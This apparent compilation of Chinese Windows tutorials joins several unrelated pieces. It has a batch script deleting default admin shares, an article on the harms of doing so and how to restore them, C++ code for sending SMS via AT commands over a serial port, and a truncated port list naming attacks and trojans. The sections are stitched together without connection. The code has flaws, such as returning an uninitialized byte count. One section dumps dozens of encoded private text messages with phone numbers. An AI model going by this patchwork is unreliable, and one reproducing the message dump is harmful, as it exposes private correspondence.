@echo off

net share C$ /del

net share D$ /del

net share ipc$ /del

net share admin$ /del

net share e$ /del

net share f$ /del

再添进组策略的用户配置》windosw配置》脚本-（登陆/注销）》登陆 就可以了。
    也许有的人关闭了默认共享，在实际使用中并没有出现任何故障。实际上默认共享只在某些情况下用到，关闭默认共享并不会影响上网聊天、收发邮件等普通操作，不过对于域控制器或网络中使用了C/S类型的软件等环境来说，盲目删除默认共享带来的危害是巨大的。下面，就从众多故障中选出几个有代表性的进行分析，希望引起大家对默认共享的重视。
    1     将域控制器上的默认共享全部关闭后，当网络中有客户端计算机想加入这个域时，则会出现问题。现象为Windows 98或Microsoft Windows Millennium Edition的客户端计算机登录到域时会出现“域登录密码不正确”、“没有权限登录域”等提示。一些Windows 2000或Windows XP的计算机登录到网络时也可能出现“域服务器不可用”等信息。如果我们手工将计算机加入域时会出现“域控制器名称没找到”的提示。
出现上述信息后，我们的客户机根本无法加入建立的域中，只能进行本机登录，在安全性和管理性上都无法达到统一，使企业网络管理无法正常进行，规划好的域无法运行。
    为什么客户端无法正常加入到域中呢？究其原因是客户机在寻找域控制器时是通过广播查找NETLOGON$这个默认共享的，如果此共享被关闭则会出现故障。

  2   在网络中任意一台计算机上禁止所有默认共享后，在网络中其他计算机上使用UNC 路径、映射的驱动器、net use命令、net view命令或通过在“网上邻居”中浏览网络，以远程方式访问或查看关闭默认共享的计算机时会收到“远程服务器不容许访问”、“系统53错误，网络路径不可达”等信息。
    出现上述信息后，网络中的其他计算机就无法访问关闭默认共享的计算机。

    3   在关闭默认共享的计算机上WINS服务可能无法启动或者WINS控制台显示红色的叉，更有甚者两个故障同时存在。虽然WINS服务在当前网络中应用的范围越来越少，但是通过WINS服务我们还是可以大大加快局域网中主机名的解析速度。WINS服务无法启动或者WINS控制台显示红叉，那么在解析主机名过程中会出现问题。
    WINS服务的异常也是我们将默认共享关闭了所带来的，关闭默认共享会使WINS相关服务与组件的运行出现问题。

      4     网络中使用了瑞星网络版杀毒软件，在使用中将服务器端的默认共享关闭后，客户端出现无法正常连接瑞星杀毒服务器的现象，同时，服务器也无法正常检测客户端的漏洞以及控制客户端升级等操作。
    上述故障自然也是将默认共享关闭造成的，瑞星网络版通过默认共享admin$来管理客户机，当客户机的admin$关闭后服务器将无法通过自身的扫描模块寻找客户机以及它们的漏洞，关闭服务器的admin$后则会出现客户机无法找到网络中的瑞星杀毒服务器的问题。
    值得注意的是，该问题不仅出现在网络版瑞星杀毒软件上，对于大多数网络版杀毒软件来说盲目关闭默认共享都可能带来此危害，甚至某些网络管理软件也会因为admin$的关闭而无法工作。

    产生上述危害的原因就是关闭了默认共享，一方面是由于人为的关闭了共享，另一方面还可能是病毒或恶意程序非法关闭了这些共享。所以对于默认共享，建议各位还是不要随意关闭为好。恢复的方法很简单，按以下几步进行设置即可。

    第一步：检查AutoShareServer和AutoShareWks注册表值，以确保未将它们设置为0。依次点击“开始→运行”，输入regedit，然后按回车键进入注册表编辑器。

    第二步：找到并单击HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanworkstation\parameters

    第三步：如果lanmanworkstation\parameters子项中的AutoShareServer 和AutoShareWks DWORD值配置的数值为0，则将该值更改为1。

    第四步：重新启动计算机。通常运行Windows Server 2003、Windows XP、Windows 2000的计算机会在启动过程中自动创建。

    第五步：启动计算机后，我们可以通过运行CMD进入命令行模式，然后运行net share，在共享列表中应该会查找到Admin$、C$和IPC$等默认共享的存在。

    提示：如果发现按照上述设置，默认共享还没有出现的话，那么很有可能是病毒或非法程序破坏了系统，我们需要用更新了最新病毒库的杀毒软件在安全模式下扫描整个系统。

    另外还有一些其他的方法，例如关闭Server服务、在网卡上去掉Microsoft客户端驱动、以及在网卡上去掉“文件和打印共享”选项等都可关闭默认共享。当使用这些方法关闭默认共享后出现上述问题时，就需要通过开启相应的Server服务，在网卡中添加相应驱动或选项来恢复默认共享。

    如何关闭默认共享是网管们经常探讨的问题，不过既然现在我们知道了关闭默认共享也会带来一定的危害，那么是否关闭就要慎重考虑了。我们可以根据实际情况自行取舍，一般在域环境中或网络中安装了网络版杀毒软件、程序的时候，还是应该保留这些默认共享，毕竟很多软件对网络的访问与使用都建立在默认共享的基础之上。

    由于程序涉及的方面很多，因此只讲关键的主要的部分。

    首先，得了解手机和电脑之间是通过什么通讯的，我的手机是有红外接口，电脑上接一个红外适配器，就可以与手机连接了，而Windows是把红外设备当作一个串口来看待的，所以关键就是在于如何用程序来控制COM端口来发送和接收数据。在网上找了很多资料然后就开始编写代码：

    列举出系统中的所有的串口：这个需要操作注册表来实现，代码如下：

void CSendMsgDlg::GetAllCom()
{
 HKEY hKey;
 LONG ret;
 OSVERSIONINFO  osvi;
 BOOL bOsVersionInfoEx;
 char keyinfo[100],comm_name[200],ValueName[200];
 int i;
 DWORD sType,Reserved,cbData,cbValueName;

 ZeroMemory(&osvi, sizeof(OSVERSIONINFO));
    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
 
 memset(keyinfo,0,100);
 strcpy(keyinfo,"HARDWARE\\DEVICEMAP\\SERIALCOMM");
    i=0; sType=REG_SZ;Reserved=0;
 bOsVersionInfoEx =GetVersionEx(&osvi);
    ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,keyinfo,0,KEY_ALL_ACCESS,&hKey);
 if (ret==ERROR_SUCCESS){
  if (osvi.dwPlatformId == VER_PLATFORM_WIN32_NT)
  {
   do
   {
    cbData=200;cbValueName=200;
    memset(comm_name,0,200);
    memset(ValueName,0,200);
    ret=RegEnumValue(hKey,i,ValueName,&cbValueName,NULL,&sType,(LPBYTE)comm_name,&cbData);
    if (ret==ERROR_SUCCESS)
    {
     //m_list.Add(comm_name);
     m_comm.AddString(comm_name);
     i++;
    }
   }while (ret==ERROR_SUCCESS);
  }
 }
 RegCloseKey(hKey);
}

得到所有的串口了，现在就应该打开串口了，一般来说计算机自己有两个串口，而红外线的标志一般是COM3。

打开串口的代码：

void CSendMsgDlg::OnButton1()
{
 char str[100];
 DWORD dwThreadID;
 memset(str,0,100);
 int sel = m_comm.GetCurSel();
 if(sel == -1)
 {
  AfxMessageBox("对不起，请选择一个接口！");
  return;
 }
 m_comm.GetLBText(sel,str);
 m_hCom = CreateFile(str,
      GENERIC_READ | GENERIC_WRITE,
      0,NULL,OPEN_EXISTING,
      FILE_FLAG_OVERLAPPED,
      NULL);

 if(m_hCom == INVALID_HANDLE_VALUE)
 {
  AfxMessageBox("对不起，连接失败！");
  return;
 }

 ASSERT(m_hCom!=INVALID_HANDLE_VALUE);
 
 SetCommMask(m_hCom, EV_RXCHAR|EV_TXEMPTY );//设置事件驱动的类型
 
 SetupComm( m_hCom, 1024,512) ; //设置输入、输出缓冲区的大小
 
 PurgeComm( m_hCom, PURGE_TXABORT | PURGE_RXABORT | PURGE_TXCLEAR | PURGE_RXCLEAR ); //清干净输入、输出缓冲区
 
 COMMTIMEOUTS CommTimeOuts ; //定义超时结构，并填写该结构

 CommTimeOuts.ReadIntervalTimeout = 0xFFFFFFFF;
 CommTimeOuts.ReadTotalTimeoutMultiplier = 0;
 CommTimeOuts.ReadTotalTimeoutConstant = 0;
 CommTimeOuts.WriteTotalTimeoutMultiplier = 0;
 CommTimeOuts.WriteTotalTimeoutConstant = 5000;
 
 
 SetCommTimeouts( m_hCom, &CommTimeOuts ) ;//设置读写操作所允许的超时
 
 DCB dcb;
 
 GetCommState(m_hCom, &dcb ) ; //读串口原来的参数设置
 
 dcb.BaudRate =9600;
 
 dcb.ByteSize =8;
 
 dcb.Parity = NOPARITY;
 
 dcb.StopBits = ONESTOPBIT ;
 
 dcb.fBinary = TRUE ;
 
 dcb.fParity = FALSE;
 
 SetCommState(m_hCom, &dcb ) ; //串口参数配置
 memset( &m_OverlappedRead, 0, sizeof( OVERLAPPED ) );
 memset( &m_OverlappedWrite, 0, sizeof( OVERLAPPED ) );

 m_OverlappedRead.hEvent = CreateEvent(NULL,TRUE,FALSE,NULL);
 m_OverlappedWrite.hEvent = CreateEvent(NULL,TRUE,FALSE,NULL);
 m_hExit = CreateEvent(NULL,NULL,FALSE,NULL);

 hCommWatchThread = CreateThread( (LPSECURITY_ATTRIBUTES) NULL,0,(LPTHREAD_START_ROUTINE)CommWatchProc,this,0, &dwThreadID );

 if(hCommWatchThread == NULL)
 {
  AfxMessageBox("对不起，连接失败！");
  return;
 }

 ASSERT(hCommWatchThread!=NULL);

 m_bConnected = true;

 m_type = 0;

 SendData("AT\r\n",strlen("AT\r\n"));
 PurgeComm(m_hCom, PURGE_RXCLEAR | PURGE_TXCLEAR | PURGE_RXABORT | PURGE_TXABORT);

 m_conn.EnableWindow(false);
 m_view.EnableWindow(true);
 m_send.EnableWindow(true);
 
}

由于在CreateFile里面设置了一个参数“FILE_FLAG_OVERLAPPED”，所以与串口要按照异步的方式进行通讯，所以启动一个线程专门作为接收数据的线程：

UINT CSendMsgDlg::CommWatchProc(LPARAM parm)
{

 CSendMsgDlg * dlg = (CSendMsgDlg *)parm;
 HANDLE m_hComDev = dlg->m_hCom;
 DWORD dwBytesRead;
 char buffer[8000];
 
 DWORD ret;

 while(true)
 {
  memset(buffer,0,8000);
  int r = dlg->ReadData(buffer,8000);
 // TRACE("%s",buffer);
  if(strlen(buffer) != 0)
   dlg->ProcessData(buffer);
  Sleep(1000);
 }
 return 0;
}

下面是读写COM口的函数：

int CSendMsgDlg::SendData(char *buffer, DWORD dwBytesWritten)
{
 BOOL bWriteStat;
 DWORD dwBytesRead;
 bWriteStat = WriteFile(m_hCom, buffer, dwBytesWritten, &dwBytesWritten, &m_OverlappedWrite );
    if(!bWriteStat)
  {
     if(GetLastError()==ERROR_IO_PENDING)
  {
  WaitForSingleObject(m_OverlappedRead.hEvent,1000);
   return ((int)dwBytesRead);
  }
  return(0);
  }
  return ((int)dwBytesRead);
}

int CSendMsgDlg::ReadData(char *buffer, DWORD dwBytesRead)
{
 BOOL   bReadStatus;
    bReadStatus = ReadFile( m_hCom, buffer, dwBytesRead, &dwBytesRead,&m_OverlappedRead);
    if(!bReadStatus)
  {
     if(GetLastError()==ERROR_IO_PENDING)
  {
       WaitForSingleObject(m_OverlappedRead.hEvent,1000);
   return ((int)dwBytesRead);
  }
  return(0);
  }
  return ((int)dwBytesRead);
}
当然了，这里的方法并不是唯一选择。

上面主要是对COM口的操作，这跟手机和短信无关，下面的部分就是与手机短信有关的部分了：

首先，得知道如何利用手机的AT指令集，我们现在需要的指令不多，只有读短信和发短信。

关于AT指令的其他命令网上有很多资料这里也不再提及了

命令：AT+CMGL

命令说明：获取短信列表

格式举例：

AT+CMGL
+CMGL: 1, 1, ,38
0891683108200205f0240D91683128500474F7000850403191611200126211572856FE4E6699865B
664E6054620021
+CMGL: 2, 1, ,70
0891683108200205f0240D91683128500474F70008504031919113003262114E0076F45C31662F4E
09597D5B66751F0020563F563F51765B9E6211662F57287BEE74039986770B4EBA5BB68DF3821E
+CMGL: 3, 1, ,64
0891683108200205f0240D91683128500474F70008504031913272002C5F53713667094E864E0D8F
C790FD662F59274E005C0F59B959B94E864F608001725B8FD860F354035AE98349
+CMGL: 4, 1, ,82
0891683108200205f0240D91683128500474F70008504031918284003E4F608D767D27542C4F6076
848BFE542700206B6A5FC3773C8FD84E0D5C1100204E004F1A80015E0863D095EE4F604F6053EF52
2B556590FD4E0D4F1A0020
+CMGL: 5, 1, ,154
0891683108200205f0240D91683128500474F70008504031916344008690A34F60600E4E484E0D4E
CE59345F0059CB542C002080AF5B9A662F5FEB80038BD54E864F60624D77406025002056F0559D54
96556189814E0D5C3157507B2C4E006392572880015E08773C76AE5E954E0B5C314E0D56F04E8600
20621173B05728592959294E5F662F4EE5549655617EF46301751F547D554A89814E0D65E9776177
404E86
+CMGL: 6, 1, ,88
0891683108200205f0240D91683128500474F70008504031914422004490A34F605C3153BB4E7090
1A51FA9898768480015E08002089814E0D5C31627E4EBA66FF4F6080030020603B776189C95BB966
1380D662404EE56211767D59294E0D7761
+CMGL: 7, 1, ,63
0891683108701305f0240BA13178855898F10008503013011285202C4F60684C4E0A7684004C0049
004E005500584E2D5348501F621162FF5BBF820D88C54E004E0B884C4E0DFF1F
+CMGL: 8, 1, ,62
0891683108200205f0240D91683128500474F70008504031913523002A54CE54404F6090A34E4880
6A660E597D597D770B4E66591A505A70B9989880AF5B9A5C3180FD8FC77684
+CMGL: 9, 1, ,32
0891683108301105f0040D91683139116779F30008503013120565000C53EF4EE563A752364E8654
17
+CMGL: 10, 1, ,36
0891683108301105f0040D91683139116779F300085030131285230010662F4E0D662F7F51901F5F
886162554A
+CMGL: 11, 1, ,38
0891683108301105f0040D91683139116779F30008503013220031001259295440002090A3662F4E
0D662F4E2D6BD2
+CMGL: 12, 1, ,38
0891683108301105f0040D91683139116779F30008503013221055001290A36211548B529E554A91
CD542F884C5417
+CMGL: 16, 1, ,151
0891683108705305f0040BA13178536816F3000850402090311220848FD979CD65F650194F605728
4E0A73ED4E865427FF0C621160F395EE95EE4F604E004E9B4E8B60C530024F6053EF4EE5544A8BC9
621153BB5E74672C79D1658779D159276982662F591A5C114E0A7EBF541730029EBB70E64F604E86
30024F604E5F628A5F2068A6534E768475358BDD544A8BC962115427FF0C514D5F97621165E0804A

+CMGL: 17, 1, ,102
0891683108301105f0040D91683139116779F300085040306112230052636E8BF46C5F6D9B768400
28003400305929653B514B59275B6682F18BED56DB7EA700290020633A597D7684002E002053EF4E
E55E2E4F608BA1521260278FC77EA7002E00204F604E708BD598984E865417
+CMGL: 18, 1, ,85
0891683108705305f0040BA13178536816F3000850404022206220424ECA59298BB25230534A8DEF
5C316CA175354E86FF0C611F89C9602A602A768430024F604EE5540E8FD8662F53EB621155E654AA
5427611F89C96BD48F834EB25207
+CMGL: 20, 1, ,56
0891683108705505f0040D91683175804276F800085040508182950024534E4E3A76847EB34E9B9E
1F4EBA5E26774088AB5B504E0A73ED3000771F768460506016
+CMGL: 21, 1, ,41
0891683108701305f0040BA13178858581F80008504080905461201666534F1F300067094E8B76F8
6C42300056DE75358BDD
+CMGL: 22, 1, ,90
0891683108705505f0040D91683175804276F8000850408011033000464F60660E59297ED9623F4E
1C62534E2A75358BDD300053F778016211665A4E0A544A8BC94F603000621190A353EF4EE54E0A7F
514E8630004ECA592998864E867B148BB0672C
+CMGL: 23, 1, ,66
0891683108705505f0040D91683175804276F80008504080223543002E0031003300350030003700
330031003400320036003253EB52185E086BCD30004F605E2E6211628A94B153E07740
+CMGL: 24, 1, ,52
0891683108705505f0040D91683175804276F8000850408022757100200031003600350030002062
1173B057286CA194B1300089817B4953D15DE58D44
+CMGL: 25, 1, ,38
0891683108705505f0040D91683175804276F8000850408022950400124F6073B057284E0D4F1A99
7F6B7B54273000
+CMGL: 26, 1, ,48
0891683108705505f0040D91683175804276F80008504080322082001C534E4E3A898162DB4E2A51
99006A00610076006176844F6067654E0D
+CMGL: 27, 1, ,44
0891683108200205f0240D91683128500474F7000850409000416200184F60771F5F3A4EE5540E53
EF4E0D65629A9A62704F604E86
+CMGL: 28, 1, ,74
0891683108200205f0240D91683128500474F700085040900081500036621165394E864EE5540E4E
0D4F1A6B3A8D1F60A880014EBA5BB64E86002C4F606B3A8D1F621162114E5F4E0D4F1A62A5602876
84002E
+CMGL: 29, 1, ,82
0891683108200205f0240D91683128500474F70008504090002273003E62116DF14FE15584670955
8462A560766709607662A5002C5BF94E864F607ED9621163024E86591A5C115C0F65F64E864EC04E
4865F650195230592A9633
+CMGL: 30, 1, ,82
0891683108200205f0240D91683128500474F70008504090009222003E62118FD85F975929592963
D091924F60002054CE4F608FD94E2A783481115B5000204F608D767D277ED9621163024E0A8FC751
E05929621168C067E553BB
+CMGL: 31, 1, ,58
0891683108200205f0240D91683128500474F7000850409000535400266211521A6D825B8C630775
326CB97B495E725B8C4E8662115C31776100204F60572873A95565
+CMGL: 32, 1, ,108
0891683108200205f0240D91683128500474F700085040900014410058776189C94E4B524D6D8263
0775326CB95C314F1A505A4E2A597D68A6800C4E1468A690FD4F1A5B9E73B04E0D4FE14F608BD58B
D5002C62114E0D8DDF4F6073A94E86660E59298FD85F9765E98D7751FA53BB73A900380038
+CMGL: 33, 1, ,76
0891683108200205f0240D91683128500474F7000850409000542200385FD84E864F60662F753776
844E864E0D8FC76CA14E8B73B057286D41884C75374EBA6D82630775326CB90020621177414E0D5F
00773C4E86
+CMGL: 34, 1, ,154
0891683108200205f0240D91683128500474F7000850401190207100864E00592954B14FE9676552
304E0053E38BB8613F4E9565C1002C62115F2F4E0B81708BB84E864E2A613F8FD85F804E9591CC62
544E2A786C5E01002E4F604E5F60F38BB8613F4F464F605F2F817065F64E0D5C0F5FC37FFB51654E
9591CC002E621188AB60CA54464E86002C5583558381EA8BED9053003A00208FD8771F7075563F00
200021
+CMGL: 35, 1, ,66
0891683108705505f0040D91683175804276F80008504031418592002E653E4E2A00760073007376
845B8988C565874EF65230670D52A156684E0A97623000628A57305740544A8BC96211
+CMGL: 36, 1, ,42
0891683108200205f0240D91683128500474F70008504031815581001680017CCA6D82795E522B5F
D87ED96211630200510051
+CMGL: 37, 1, ,72
0891683108200205f0240D91683128500474F70008504031819571003454CE54DF4F608FD84E0A8B
FE002C626B76F273ED5427003F770B676562116BCF592965E94E0A90FD5F9763D091924F604E006B
21
+CMGL: 38, 1, ,158
0891683108705505f0040D91683157011065F00008504001227091008A84288FBE59C66D3E624B4E
0B53BB89C25BDF654C60C5002C4E0D4E004F1A513F624B4E0B53065FD956DE6765002C752898DF63
07548C4E2D63074F5C51FA0056578B624B52BF002C84288FBE59C69AD8517476848BF4201C62114E
EC80DC52294E86003F201D624B4E0B8BF4201C522B4ED65988626F4E86002C5C31526954B14EEC4F
E94E863002201D
+CMGL: 40, 1, ,34
0891683108200205f0240D91683128500474F70008504001226243000E84288FBE6BCD662F621190
E84E0B

呵呵有点长了，这是刚刚我从我手机中读取出来的数据，是经过编码以后的，有兴趣的话可以“翻译”出来看看是什么内容：）

关于SMS PDU格式的说明，推荐一个地址：

http://shuixin13.mblogger.cn/posts/10087.aspx

这里的资料已经够全了，基本可以包括所有的操作。

OK，读取手机短信不是我们的主要目的，在这里就不罗索了，只要仔细研究一下SMS PDU格式的那个文档，基本就不会有什么问题，我们的主要目的是发短信，现在就着重讲讲这一部分好了：

发短信的指令格式和编码格式也可以参考上面的地址，里面讲的也很详细了，我也不在这里罗嗦了，现在的关键问题是，如何根据格式来编码和解码。

首先，我们先建立一个Class来保存要发送的数据，每个字段用相应的类型表示，还要有一个“打包”的函数，就是把每一部分的数据组合起来。

class CMsgSend 
{
public:
 CString GetMsgData();
 void Pack(CString c_number,CString s_number,CString msg);
 CMsgSend();
 virtual ~CMsgSend();
 CString m_strData;
 CString SCA;
 CString PDUType;
 CString MR;
 CString DA;
 CString PID;
 CString DCS;
 CString VP;
 CString UDL;
 CString UD;
};
其中m_strData保存“打包”以后的数据，其他各个成员变量的含义请参照文档。

Pack是打包函数，需要三个参数：短信服务中心号码、接收短信手机号码和信息内容。

另外，我们还需要一个工具类来实现编码和解码：

class CMyTools 
{
public:
 static void HexToChar(CString sHex,char *p);//将十六进制转换为字符数组
 static CString DeCodeChinese(CString strSrc);//中文解码
 static CString EnCodeChinese(CString strSrc);//中文编码
 static CString SwapConvert(CString str);//交换，例如1234567890变换为2143658709，具体什么用看文档
 static BYTE HexToChar(CString str);//十六进制转换为字符类型
 static CString DeCodeEnglish(CString srcStr);//英文解码
 static CString EnCodeEnglish(CString srcStr);//英文编码
};

CString CMyTools::EnCodeEnglish(CString srcStr)
{
 CString result;
 BYTE cur,c1,c2;
 CString tmp;
 int len,i=0,j=0;
 len = srcStr.GetLength() - 1;
 result = "";
 while(i <= len)
 {
  c1 = srcStr.GetAt(i);
  if(i < len)
  {
   c2 = srcStr.GetAt(i+1);
   cur = (c1 >> j) | (c2 << (7-j) & 0xff);
  }
  else
   cur = (c1 >> j) & 0x7f;
  tmp.Format("%2.2X",cur);
  result = result + tmp;
  i++;
  j = (j+1) % 7;
  if(j == 0)
   i++;
 }
 return result;
}

CString CMyTools::DeCodeEnglish(CString srcStr)
{
 CString strDest,strData;
 int n = 0,i,flag = 0,j = 0;
 strData = "";
 int len = srcStr.GetLength();
 for(i=0;i<len-1;i+=2)
 {
  CString strTmp;
  char tmp;
  strTmp.Format("0x%1c%1c",srcStr.GetAt(i),srcStr.GetAt(i+1));
  tmp = HexToChar((LPSTR)(LPCTSTR)strTmp);
  strData = strData + tmp;
 }

 len = len/2 + len/2/8;
 for(i = 0;i<len;i++)
 {
  strDest = strDest + " ";
 }
 for(i=0;i<len;i++)
 {
  BYTE c1,c2;
  if(i == 0)
  {
   c1 = strData.GetAt(i);
   strDest.SetAt(i,c1 & 0x7f);
  }
  else
  {
   c1 = strData.GetAt(j);
   c2 = strData.GetAt(j+1);
   strDest.SetAt(i,(c2 << n) | (c1  >> (8 - n)));
   strDest.SetAt(i,strDest.GetAt(i) & 0x7f);
   if(i%8 != 0)
    j++;
  }
  n = (i % 8) + 1;
 }
 return strDest;
}

BYTE CMyTools::HexToChar(CString hex)
{
 int base = 1;
 int ret = 0;
 for(int i=hex.GetLength()-1;i>=0;i--)
 {
  char chex = hex.GetAt(i);
  int ihex;
  if(chex >= 'A' && chex <='F')
  {
   ihex = 15 - ('F' - chex);
  }
  else
  if(chex >= 'a' && chex <='f')
  {
   ihex = 15 - ('f' - chex);
  }
  else
   ihex = chex - '0';
  ret += ihex * base;
  base*=16;
 }
 return ret;
}

CString CMyTools::SwapConvert(CString str)
{
 CString result;
 result = str;
 for(int i=0;i<strlen(str);i+=2)
 {
  result.SetAt(i,str.GetAt(i+1));
  result.SetAt(i+1,str.GetAt(i));
 }
 return result;
}

CString CMyTools::EnCodeChinese(CString strSrc)
{

 CString strResult = "",strTmp,str;
 char lpBuff;
 int len = strSrc.GetLength();
 int i;
 WCHAR * wc;
 wc = new WCHAR[len];

 for(i=0;i<strSrc.GetLength();i++)
 {
  if((strSrc.GetAt(i) & 0x80) >> 7 == 0)
   len++;
 }

 MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED,(LPSTR)(LPCTSTR)strSrc,len,wc,len/2);
 for(i=0;i<len/2;i++)
 {
  strTmp.Format("%4.4X",wc[i]);
  strResult += strTmp;
 }
 return strResult;
}

CString CMyTools::DeCodeChinese(CString strSrc)
{
 char *pBuf;
 CString strMsg = strSrc;
 int nLength = strMsg.GetLength();
 if (nLength%2 == 1)
 {
  strMsg = strMsg.Left(nLength-1);
  int nNewLen = strMsg.GetLength();
  pBuf = new char[nNewLen/2];
 }
 else
 {
  pBuf = new char[nLength/2];
 }
 HexToChar(strMsg,pBuf);
 int i = 0,nZero = 0;
 while ((i = strMsg.Find("00",i))>=0)
 {
  i += 2;
  nZero++;
 }
 char u_ret[255];
 memset(u_ret,0,255);
 int nResult=WideCharToMultiByte(
          CP_ACP,    // code page
          WC_COMPOSITECHECK, // character-type options
          (LPCWSTR)pBuf,  // string to map
          nLength/4,     //str.GetLength(),  // number of bytes in string
          (LPSTR)u_ret,  // wide-character buffer
          sizeof(u_ret),     // size of buffer
          NULL,
          NULL
           );
 
 CString sMessage;
 sMessage.Format("%s",u_ret);
 return sMessage;
}

void CMyTools::HexToChar(CString sHex, char *p)
{
unsigned char byteToHex[] =
{'0', '1', '2', '3', '4', '5', '6', '7', '8', '9',
 'A', 'B', 'C', 'D', 'E', 'F'};
 int nLen = sHex.GetLength();
 char *chBuf = p,//记录内存块的首地址
    *pch;
 CString sTemp,sLeft,sRight;
 for (int i=0; i<nLen/4; i++)
 {
  sTemp = sHex.Left(4);
  sHex.Delete(0,4);
  sLeft = sTemp.Left(2);
  sRight = sTemp.Right(2);
  *chBuf = (char)strtoul(sRight.GetBuffer(2),&pch,16);
  chBuf++;
  sRight.ReleaseBuffer();
  *chBuf = (char)strtoul(sLeft.GetBuffer(2),&pch,16);
  chBuf++;         
  sLeft.ReleaseBuffer();
 }
 *chBuf='\0';

}

编码解码的工具都全了，现在来看“打包”函数：

void CMsgSend::Pack(CString c_number,CString s_number,CString msg)
{
 int len;

 SCA= "00";

 //PDUTtpe
 PDUType = "31";

 //MR
 MR = "00";

 //DA
 s_number = s_number + "F";
 len = s_number.GetLength();
 DA.Format("%2.2X81",len-1);
 DA = DA + CMyTools::SwapConvert(s_number);

 //PID
 PID = "00";

 //DCS
 DCS = "08";

 //VP
 VP = "A7";

 //UD
 UD = CMyTools::EnCodeChinese(msg);

 //UDL
 UDL.Format("%2.2X",UD.GetLength()/2);

 m_strData = SCA + PDUType + MR + DA + PID + DCS + VP + UDL + UD;
}
例如我想给13875998800发送一条内容是hello的信息，短信中心号码为8613800731500，我们可以这样调用：

msg.Pack("8613800731500","13875998800","hello");
 sendMsg = msg.GetMsgData();
 m.Format("AT+CMGS=%d\r\n",(sendMsg.GetLength()-msg.SCA.GetLength())/2);
 SendData((LPSTR)(LPCTSTR)m,m.GetLength());
 m.Format("%s%c",sendMsg,26);
 SendData((LPSTR)(LPCTSTR)m,m.GetLength());

具体的编码过程上面文档里面说的已经够详细了，也不在这里多说。

这里由于篇幅原因省略了很多东西，反正原理就是这些，核心代码也就是上面的一些编码解码的东西了，有些代码我也是从网上找到然后修改了一下来用的。

其实用AT指令还可以干很多事情，甚至拨打电话之类的都没问题，拨打电话的AT指令很简单：

ATD13875998800，只要发送这个指令过去，手机就会拨打13875998800这个号码。不过经过实践，发现被叫的手机无法正常的接听，提示要与电脑设备连接才可以接听，具体如何实现就没研究过了.....

端口：1
服务：tcpmux
说明：这显示有人在寻找SGI Irix机器。Irix是实现tcpmux的主要提供者，默认情况下tcpmux在这种系统中被打开。Irix机器在发布是含有几个默认的无密码的帐户，如：IP、GUEST UUCP、NUUCP、DEMOS 、TUTOR、DIAG、OUTOFBOX等。许多管理员在安装后忘记删除这些帐户。因此HACKER在INTERNET上搜索tcpmux并利用这些帐户。
端口：7
服务：Echo
说明：能看到许多人搜索Fraggle放大器时，发送到X.X.X.0和X.X.X.255的信息。
端口：19
服务：Character Generator
说明：这是一种仅仅发送字符的服务。UDP版本将会在收到UDP包后回应含有垃圾字符的包。TCP连接时会发送含有垃圾字符的数据流直到连接关闭。HACKER利用IP欺骗可以发动DoS攻击。伪造两个chargen服务器之间的UDP包。同样Fraggle DoS攻击向目标地址的这个端口广播一个带有伪造受害者IP的数据包，受害者为了回应这些数据而过载。
端口：21
服务：FTP
说明：FTP服务器所开放的端口，用于上传、下载。最常见的攻击者用于寻找打开anonymous的FTP服务器的方法。这些服务器带有可读写的目录。木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口。
端口：22
服务：Ssh
说明：PcAnywhere建立的TCP和这一端口的连接可能是为了寻找ssh。这一服务有许多弱点，如果配置成特定的模式，许多使用RSAREF库的版本就会有不少的漏洞存在。
端口：23
服务：Telnet
说明：远程登录，入侵者在搜索远程登录UNIX的服务。大多数情况下扫描这一端口是为了找到机器运行的操作系统。还有使用其他技术，入侵者也会找到密码。木马Tiny Telnet Server就开放这个端口。
端口：25
服务：SMTP
说明：SMTP服务器所开放的端口，用于发送邮件。入侵者寻找SMTP服务器是为了传递他们的SPAM。入侵者的帐户被关闭，他们需要连接到高带宽的E-MAIL服务器上，将简单的信息传递到不同的地址。木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口。
端口：31
服务：MSG Authentication
说明：木马Master Paradise、Hackers Paradise开放此端口。
端口：42
服务：WINS Replication
说明：WINS复制
端口：53
服务：Domain Name Server（DNS）
说明：DNS服务器所开放的端口，入侵者可能是试图进行区域传递（TCP），欺骗DNS（UDP）或隐藏其他的通信。因此防火墙常常过滤或记录此端口。
端口：67
服务：Bootstrap Protocol Server
说明：通过DSL和Cable modem的防火墙常会看见大量发送到广播地址255.255.255.255的数据。这些机器在向DHCP服务器请求一个地址。HACKER常进入它们，分配一个地址把自己作为局部路由器而发起大量中间人（man-in-middle）攻击。客户端向68端口广播请求配置，服务器向67端口广播回应请求。这种回应使用广播是因为客户端还不知道可以发送的IP地址。
端口：69
服务：Trival File Transfer
说明：许多服务器与bootp一起提供这项服务，便于从系统下载启动代码。但是它们常常由于错误配置而使入侵者能从系统中窃取任何 文件。它们也可用于系统写入文件。
端口：79
服务：Finger Server
说明：入侵者用于获得用户信息，查询操作系统，探测已知的缓冲区溢出错误，回应从自己机器到其他机器Finger扫描。
端口：80
服务：HTTP
说明：用于网页浏览。木马Executor开放此端口。
端口：99
服务：Metagram Relay
说明：后门程序ncx99开放此端口。
端口：102
服务：Message transfer agent(MTA)-X.400 over TCP/IP
说明：消息传输代理。

端口：109
服务：Post Office Protocol -Version3
说明：POP3服务器开放此端口，用于接收邮件，客户端访问服务器端的邮件服务。POP3服务有许多公认的弱点。关于用户名和密码交 换缓冲区溢出的弱点至少有20个，这意味着入侵者可以在真正登陆前进入系统。成功登陆后还有其他缓冲区溢出错误。
端口：110
服务：SUN公司的RPC服务所有端口
说明：常见RPC服务有rpc.mountd、NFS、rpc.statd、rpc.csmd、rpc.ttybd、amd等
端口：113
服务：Authentication Service
说明：这是一个许多计算机上运行的协议，用于鉴别TCP连接的用户。使用标准的这种服务可以获得许多计算机的信息。但是它可作为许多服务的记录器，尤其是FTP、POP、IMAP、SMTP和IRC等服务。通常如果有许多客户通过防火墙访问这些服务，将会看到许多这个端口的连接请求。记住，如果阻断这个端口客户端会感觉到在防火墙另一边与E-MAIL服务器的缓慢连接。许多防火墙支持TCP连接的阻断过程中发回RST。这将会停止缓慢的连接。
端口：119
服务：Network News Transfer Protocol
